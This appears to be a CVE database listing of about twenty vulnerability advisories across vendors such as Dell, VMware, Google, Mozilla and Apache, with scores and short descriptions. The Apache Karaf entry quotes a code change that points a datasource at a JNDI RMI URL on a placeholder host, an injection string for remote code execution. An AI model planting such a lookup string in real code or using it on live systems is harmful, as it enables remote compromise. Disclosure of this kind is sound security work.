Vulnerabilities (CVE)

Filtered by NVD-CWE-Other
Total 28982 CVE
CVE Vendors Products Updated CVSS v2 CVSS v3
CVE-2022-34450 1 Dell 1 Powerpath Management Appliance 2024-02-28 N/A 6.7 MEDIUM
PowerPath Management Appliance with version 3.3 contains Privilege Escalation vulnerability. An authenticated admin user could potentially exploit this issue and gain unrestricted control/code execution on the system as root.
CVE-2022-31704 1 Vmware 1 Vrealize Log Insight 2024-02-28 N/A 9.8 CRITICAL
The vRealize Log Insight contains a broken access control vulnerability. An unauthenticated malicious actor can remotely inject code into sensitive files of an impacted appliance which can result in remote code execution.
CVE-2022-39900 1 Google 1 Android 2024-02-28 N/A 4.6 MEDIUM
Improper access control vulnerability in Nice Catch prior to SMR Dec-2022 Release 1 allows physical attackers to access contents of all toast generated in the application installed in Secure Folder through Nice Catch.
CVE-2022-46967 1 Revenue Collection System Project 1 Revenue Collection System 2024-02-28 N/A 9.8 CRITICAL
An access control issue in Revenue Collection System v1.0 allows unauthenticated attackers to view the contents of /admin/DBbackup/ directory.
CVE-2022-45408 1 Mozilla 3 Firefox, Firefox Esr, Thunderbird 2024-02-28 N/A 6.5 MEDIUM
Through a series of popups that reuse windowName, an attacker can cause a window to go fullscreen without the user seeing the notification prompt, resulting in potential user confusion or spoofing attacks. This vulnerability affects Firefox ESR < 102.5, Thunderbird < 102.5, and Firefox < 107.
CVE-2022-46754 1 Dell 1 Wyse Management Suite 2024-02-28 N/A 6.5 MEDIUM
Wyse Management Suite 3.8 and below contain an improper access control vulnerability. A authenticated malicious admin user might access certain pro license features for which this admin is not authorized in order to configure user controlled external entities.
CVE-2022-28173 1 Hikvision 4 Ds-3wf01c-2n\/o, Ds-3wf01c-2n\/o Firmware, Ds-3wf0ac-2nt and 1 more 2024-02-28 N/A 9.8 CRITICAL
The web server of some Hikvision wireless bridge products have an access control vulnerability which can be used to obtain the admin permission. The attacker can exploit the vulnerability by sending crafted messages to the affected devices.
CVE-2022-47717 1 Lastyard 1 Last Yard 2024-02-28 N/A 7.5 HIGH
Last Yard 22.09.8-1 is vulnerable to Cross-origin resource sharing (CORS).
CVE-2022-40633 1 Rittal 2 Cmc Iii, Cmc Iii Firmware 2024-02-28 N/A 4.6 MEDIUM
A malicious actor can clone access cards used to open control cabinets secured with Rittal CMC III locks.
CVE-2022-39898 1 Google 1 Android 2024-02-28 N/A 3.3 LOW
Improper access control vulnerability in IIccPhoneBook prior to SMR Dec-2022 Release 1 allows attackers to access some information of usim.
CVE-2022-32945 1 Apple 3 Ipados, Iphone Os, Macos 2024-02-28 N/A 4.3 MEDIUM
An access issue was addressed with additional sandbox restrictions on third-party apps. This issue is fixed in macOS Ventura 13. An app may be able to record audio with paired AirPods.
CVE-2023-0002 2 Microsoft, Paloaltonetworks 2 Windows, Cortex Xdr Agent 2024-02-28 N/A 7.8 HIGH
A problem with a protection mechanism in the Palo Alto Networks Cortex XDR agent on Windows devices allows a local user to execute privileged cytool commands that disable or uninstall the agent.
CVE-2023-0704 1 Google 1 Chrome 2024-02-28 N/A 6.5 MEDIUM
Insufficient policy enforcement in DevTools in Google Chrome prior to 110.0.5481.77 allowed a remote attacker to bypass same origin policy and proxy settings via a crafted HTML page. (Chromium security severity: Low)
CVE-2022-46908 1 Sqlite 1 Sqlite 2024-02-28 N/A 7.3 HIGH
SQLite through 3.40.0, when relying on --safe for execution of an untrusted CLI script, does not properly implement the azProhibitedFunctions protection mechanism, and instead allows UDF functions such as WRITEFILE.
CVE-2022-4613 1 Clickstudios 1 Passwordstate 2024-02-28 N/A 6.5 MEDIUM
A vulnerability was found in Click Studios Passwordstate and Passwordstate Browser Extension Chrome and classified as critical. This issue affects some unknown processing of the component Browser Extension Provisioning. The manipulation leads to improper authorization. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-216275.
CVE-2022-40196 1 Intel 1 Oneapi Dpc\+\+\/c\+\+ Compiler 2024-02-28 N/A 7.8 HIGH
Improper access control in the Intel(R) oneAPI DPC++/C++ Compiler before version 2022.2.1 and Intel C++ Compiler Classic before version 2021.7.1 for some Intel(R) oneAPI Toolkits before version 2022.3.1 may allow an authenticated user to potentially enable escalation of privilege via local access.
CVE-2022-40145 1 Apache 1 Karaf 2024-02-28 N/A 9.8 CRITICAL
This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource use InitialContext.lookup(jndiName) without filtering. An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7. We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8
CVE-2023-0158 1 Nlnetlabs 1 Krill 2024-02-28 N/A 7.5 HIGH
NLnet Labs Krill supports direct access to the RRDP repository content through its built-in web server at the "/rrdp" endpoint. Prior to 0.12.1 a direct query for any existing directory under "/rrdp/", rather than an RRDP file such as "/rrdp/notification.xml" as would be expected, causes Krill to crash. If the built-in "/rrdp" endpoint is exposed directly to the internet, then malicious remote parties can cause the publication server to crash. The repository content is not affected by this, but the availability of the server and repository can cause issues if this attack is persistent and is not mitigated.
CVE-2022-34405 1 Dell 34 Alienware Area 51m R1, Alienware Area 51m R2, Alienware Aurora R10 and 31 more 2024-02-28 N/A 7.3 HIGH
An improper access control vulnerability was identified in the Realtek audio driver. A local authenticated malicious user may potentially exploit this vulnerability by waiting for an administrator to launch the application and attach to the process to elevate privileges on the system.
CVE-2022-38461 1 Wpml 1 Wpml 2024-02-28 N/A 4.3 MEDIUM
Broken Access Control vulnerability in WPML Multilingual CMS premium plugin <= 4.5.10 on WordPress allows users with a subscriber or higher user role to change plugin settings (selected language for legacy widgets, the default behavior for media content).